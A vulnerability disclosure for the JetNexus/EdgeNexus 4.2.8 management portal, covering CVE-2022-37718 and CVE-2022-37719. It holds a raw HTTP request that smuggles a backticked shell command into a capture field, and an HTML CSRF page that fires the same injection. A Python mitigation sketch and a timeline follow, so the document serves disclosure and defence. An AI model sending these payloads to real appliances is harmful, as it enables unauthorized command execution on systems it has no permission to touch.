JetNexus/EdgeNexus 4.2.8 Vulnerability Disclosure


Proof of Concept:

Command Injection (CVE-2022-37718):

POST /POST/23?iAction=4&iType=1 HTTP/1.1
Host: EDGENEXUS-HOST
Cookie: GUID=e8bf4ecfb2f747429088ade52b1a9afe
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 109
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"CaptureHidden":"","Adapter":"eth0`touch /tmp/pwn`","Packets":"1","Duration":"1","CaptureAddress":"1.1.1.1"}

Cross-Site Request Forgery (CVE-2022-37719):

<!-- Cross-Site Request Forgery payload, triggering command injection -->
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://EDGENEXUS-HOST/POST/23?iAction=4&iType=1" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;CaptureHidden&quot;&#58;&quot;&quot;&#44;&quot;Adapter&quot;&#58;&quot;eth0&#96;touch&#32;&#47;tmp&#47;pwn1&#96;&quot;&#44;&quot;Packets&quot;&#58;&quot;1&quot;&#44;&quot;Duration&quot;&#58;&quot;1&quot;&#44;&quot;CaptureAddress&quot;&#58;&quot;1&#46;1&#46;1&#46;1&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Mitre Reference:


CVE-2022-37718

Vulnerability Type: Command Injection
Affected Product Code Base: JetNexus/EdgeNexus ADC - 4.2.8
Affected Component: JetNexus/EdgeNexus management portal
Description: The network management component of JetNexus/EdgeNexus v4.2.8 was discovered to contain a command injection vulnerability. This vulnerability allows authenticated attackers to execute arbitrary commands.
Attack Vectors: A remote authenticated attacker can run arbitrary shell commands by sending a specially crafted request to the JetNexus troubleshooting tools.
Attack Type: Remote
Impact Code execution: true
Impact Escalation of Privileges: true
Impact Information Disclosure: true

CVE-2022-37719

Vulnerability Type: Cross-Site Request Forgery (CSRF)
Affected Product Code Base: JetNexus/EdgeNexus ADC - 4.2.8
Affected Component: JetNexus/EdgeNexus management portal
Description: A Cross-Site Request Forgery (CSRF) in the management portal of JetNexus/EdgeNexus v4.2.8 allows attackers to escalate privileges and execute arbitrary code via unspecified vectors.
Attack Vectors: An authenticated user must click a malicious link to a page that hosts the CSRF payload.
CVE Impact Other: Impersonation
Attack Type: Remote
Impact Escalation of Privileges: true
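
Mitigation sketch for both issues above, added here as an example and not taken from the vendor's code or from the original advisory: the handler refuses requests of the kind a cross-site HTML form produces, then validates every capture field against an allowlist before building an argument vector that is run without a shell. The names check_headers and build_capture_argv, the numeric bounds, and the use of timeout and tcpdump as the capture command are assumptions.

```python
import ipaddress
import json
import re

# Conservative allowlists: interface name (max 15 chars, no leading dash)
# and a positive counter of at most four digits (assumed bound).
IFACE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,14}")
COUNT_RE = re.compile(r"[1-9][0-9]{0,3}")


class Rejected(ValueError):
    """Request refused before anything reaches the capture tool."""


def check_headers(content_type, origin, portal_origin):
    # An HTML form can only send urlencoded, multipart or text/plain bodies,
    # so insisting on application/json refuses the form-based CSRF request.
    if content_type.split(";")[0].strip().lower() != "application/json":
        raise Rejected("unexpected Content-Type")
    # Browsers attach Origin to cross-site POSTs; it must be the portal itself.
    if origin != portal_origin:
        raise Rejected("cross-origin request")


def build_capture_argv(body):
    try:
        fields = json.loads(body)
    except ValueError as exc:
        raise Rejected("body is not JSON") from exc
    if not isinstance(fields, dict):
        raise Rejected("body is not a JSON object")
    adapter = fields.get("Adapter", "")
    packets = fields.get("Packets", "")
    duration = fields.get("Duration", "")
    if not (isinstance(adapter, str) and IFACE_RE.fullmatch(adapter)):
        raise Rejected("bad Adapter")
    for value in (packets, duration):
        if not (isinstance(value, str) and COUNT_RE.fullmatch(value)):
            raise Rejected("bad Packets/Duration")
    try:
        address = ipaddress.ip_address(str(fields.get("CaptureAddress", "")))
    except ValueError as exc:
        raise Rejected("bad CaptureAddress") from exc
    # argv list for subprocess.run(argv) with no shell: each value stays one
    # argument, so backticks and other metacharacters are never interpreted.
    # Using timeout and tcpdump here is an assumption, not the product's code.
    return ["timeout", duration, "tcpdump", "-i", adapter,
            "-c", packets, "host", str(address)]
```

The header checks are one layer; a per-session anti-CSRF token or SameSite cookies are still needed on state-changing endpoints.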


Timeline:


09/14/22 - initial contact disclosure